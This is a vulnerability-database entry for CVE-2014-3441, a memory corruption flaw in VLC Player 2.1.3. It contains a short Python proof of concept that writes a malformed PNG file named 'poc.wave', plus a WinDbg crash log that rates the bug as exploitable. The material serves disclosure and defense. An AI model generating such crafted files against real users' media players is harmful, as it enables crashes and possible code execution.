Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

VLC Player 2.1.3 Memory Corruption

🗓️ 09 May 2014 00:00:00Reported by Aryan BayaninejadType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

VLC Player 2.1.3 Memory Corruption via Malformed .png File Forma

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2014-3441
9 May 201400:00
circl
CVE		CVE-2014-3441
14 May 201419:00
cve
Cvelist		CVE-2014-3441
14 May 201419:00
cvelist
Debian CVE		CVE-2014-3441
14 May 201419:00
debiancve
EUVD		EUVD-2014-3453
7 Oct 202500:30
euvd
Kaspersky		KLA10008 Denial of Service in VideoLAN VLC Media Player
14 May 201400:00
kaspersky
NVD		CVE-2014-3441
14 May 201419:55
nvd
OpenVAS		VLC Media Player Denial of Service Vulnerability -01 (Jun 2014) - Windows
4 Jun 201400:00
openvas
OpenVAS		VLC Media Player Denial of Service Vulnerability -01 (Jun 2014) - Mac OS X
4 Jun 201400:00
openvas
OpenVAS		VLC Media Player Denial of Service Vulnerability -01 (Jun 2014) - Linux
4 Jun 201400:00
openvas
Rows per page
`# Exploit Title: [VLCplayer memory corruption in latest Version 2.1.3 ]  
# Date: [2014/05/07]  
# Exploit Author: [Aryan Bayaninejad]  
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]  
# Vendor Homepage: [www.videolan.org]  
# Software Link: [  
http://filehippo.com/download_vlc_32/download/b39c14a9f03cb9cf32eb01b1123b97bf/  
]  
# Version: [Version 2.1.3 and prior to that]  
# Tested on: [Windows Xp Sp 3 x86]  
# CVE : [2014-3441]  
  
details:  
  
VLCplayer latest version V 2.1.3 suffers from an memory corruption  
Vulnerability via a malformed .png file format when load  
codec\libpng_plugin.dll, you can change file extention to .wave  
  
  
Poc:  
  
#!/usr/bin/python  
data =  
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xFF\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"  
outfile = file("poc.wave", 'wb')  
outfile.write(data)  
outfile.close()  
print "Created Poc"  
  
  
  
  
  
windbg result:  
  
  
Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86  
Copyright (c) Microsoft Corporation. All rights reserved.  
  
CommandLine: "C:\Program Files\VideoLAN\VLC\vlc.exe"  
Symbol search path is: *** Invalid ***  
****************************************************************************  
* Symbol loading may be unreliable without a symbol search path. *  
* Use .symfix to have the debugger choose a symbol path. *  
* After setting your symbol path, use .reload to refresh symbol locations. *  
****************************************************************************  
Executable search path is:  
ModLoad: 00400000 00426000 image00400000  
ModLoad: 7c900000 7c9af000 ntdll.dll  
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll  
ModLoad: 6a300000 6a324000 C:\Program Files\VideoLAN\VLC\libvlc.dll  
ModLoad: 6a540000 6a791000 C:\Program Files\VideoLAN\VLC\libvlccore.dll  
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll  
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll  
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll  
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll  
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.DLL  
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll  
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll  
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll  
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.DLL  
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll  
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll  
ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL  
ModLoad: 771b0000 7725a000 C:\WINDOWS\system32\WININET.DLL  
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll  
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll  
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll  
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll  
(250.c1c): Break instruction exception - code 80000003 (first chance)  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
ntdll.dll -  
eax=00351eb4 ebx=7ffde000 ecx=00000006 edx=00000040 esi=00351f48  
edi=00351eb4  
eip=7c90120e esp=0022fb20 ebp=0022fc94 iopl=0 nv up ei pl nz na po  
nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  
efl=00000202  
ntdll!DbgBreakPoint:  
7c90120e cc int 3  
0:000> g  
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL  
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL  
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll  
ModLoad: 773d0000 774d3000  
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll  
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll  
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll  
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll  
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime  
ModLoad: 10000000 10008000 C:\Program Files\Internet Download  
Manager\idmmkb.dll  
ModLoad: 64fc0000 65008000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll  
ModLoad: 6aac0000 6aacf000 C:\Program  
Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll  
ModLoad: 6e980000 6e990000 C:\Program  
Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll  
ModLoad: 6a100000 6a119000 C:\Program  
Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll  
ModLoad: 6c400000 6c5f6000 C:\Program  
Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll  
ModLoad: 68740000 68760000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll  
ModLoad: 6f440000 6f483000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll  
ModLoad: 6b840000 6b85b000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libaccess_vdr_plugin.dll  
ModLoad: 6f100000 6f114000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll  
ModLoad: 68bc0000 68bd7000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll  
ModLoad: 64a00000 64a8b000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll  
ModLoad: 70680000 70736000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll  
ModLoad: 6ae40000 6ae64000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll  
ModLoad: 69e40000 69e52000 C:\Program  
Files\VideoLAN\VLC\plugins\access\libstream_filter_rar_plugin.dll  
ModLoad: 6d700000 6d70c000 C:\Program  
Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll  
ModLoad: 70240000 70267000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll  
ModLoad: 6cd00000 6ce7a000 C:\Program  
Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll  
ModLoad: 66040000 66090000 C:\Program  
Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll  
ModLoad: 625c0000 626f9000 C:\Program  
Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll  
ModLoad: 73f10000 73f6c000 C:\WINDOWS\system32\DSOUND.DLL  
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll  
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv  
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll  
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll  
ModLoad: 6ff40000 6ff55000 C:\Program  
Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll  
ModLoad: 6e180000 6e191000 C:\Program  
Files\VideoLAN\VLC\plugins\control\libglobalhotkeys_plugin.dll  
main libvlc: Running vlc with the default interface. Use 'cvlc' to use vlc  
without interface.  
ModLoad: 68e80000 6992e000 C:\Program  
Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll  
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.DLL  
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV  
ModLoad: 71ad0000 71ad9000 C:\WINDOWS\system32\WSOCK32.DLL  
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\userenv.dll  
ModLoad: 01a20000 01ce5000 C:\WINDOWS\system32\xpsp2res.dll  
ModLoad: 5d090000 5d12a000 C:\WINDOWS\system32\comctl32.dll  
ModLoad: 76360000 76370000 C:\WINDOWS\system32\winsta.dll  
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll  
ModLoad: 6d6c0000 6d6f7000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll  
ModLoad: 6e040000 6e05e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libavi_plugin.dll  
ModLoad: 68440000 68458000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libasf_plugin.dll  
ModLoad: 6c380000 6c39b000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libflacsys_plugin.dll  
ModLoad: 6ef40000 6ef4e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libes_plugin.dll  
es demux error: cannot peek  
es demux error: cannot peek  
ModLoad: 011e0000 011fa000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libmpc_plugin.dll  
ModLoad: 6c2c0000 6c2cd000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libtta_plugin.dll  
ModLoad: 62380000 6238e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libnuv_plugin.dll  
ModLoad: 67e00000 67e0d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libwav_plugin.dll  
ModLoad: 03610000 036fc000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libsid_plugin.dll  
ModLoad: 6bf40000 6bf65000 C:\Program  
Files\VideoLAN\VLC\plugins\services_discovery\libsap_plugin.dll  
ModLoad: 6f8c0000 6f8eb000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libogg_plugin.dll  
ModLoad: 6a840000 6a96f000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libmkv_plugin.dll  
ModLoad: 70b00000 70b0c000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libdirac_plugin.dll  
ModLoad: 6d8c0000 6d97b000 C:\Program  
Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll  
ModLoad: 64740000 6474d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libsmf_plugin.dll  
ModLoad: 6cbc0000 6cbcd000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libpva_plugin.dll  
ModLoad: 65300000 6530c000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libxa_plugin.dll  
ModLoad: 67500000 6750d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libaiff_plugin.dll  
ModLoad: 6ce80000 6ce8d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libvoc_plugin.dll  
ModLoad: 6fec0000 6fecc000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libau_plugin.dll  
ModLoad: 6b500000 6b56d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libgme_plugin.dll  
ModLoad: 65280000 6528d000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\librawvid_plugin.dll  
ModLoad: 6c940000 6c94e000 C:\Program  
Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll  
ModLoad: 683c0000 6840f000 C:\Program  
Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll  
(250.b14): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\WINDOWS\system32\msvcrt.dll -  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll -  
eax=00000000 ebx=018dee98 ecx=03ffe8c8 edx=00000000 esi=018ded80  
edi=018e5000  
eip=77c47631 esp=029ff940 ebp=029ff980 iopl=0 nv up ei pl nz na pe  
nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  
efl=00010206  
msvcrt!memset+0x41:  
77c47631 f3ab rep stos dword ptr es:[edi]  
0:009> .load winext/msec.dll  
0:009> !exploitable  
  
!exploitable 1.6.0.0  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\Program Files\VideoLAN\VLC\libvlccore.dll -  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\Program Files\VideoLAN\VLC\plugins\demux\libimage_plugin.dll -  
Exploitability Classification: EXPLOITABLE  
Recommended Bug Title: Exploitable - User Mode Write AV starting at  
msvcrt!memset+0x0000000000000041 (Hash=0xefdbe58f.0x255f6419)  
  
User mode write access violations that are not near NULL are exploitable.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 May 2014 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.07967
vlc player version 2.1.3memory corruptionmalformed .png filevulnerabilitylibpng_plugin.dll.wave filewindows xp sp3
34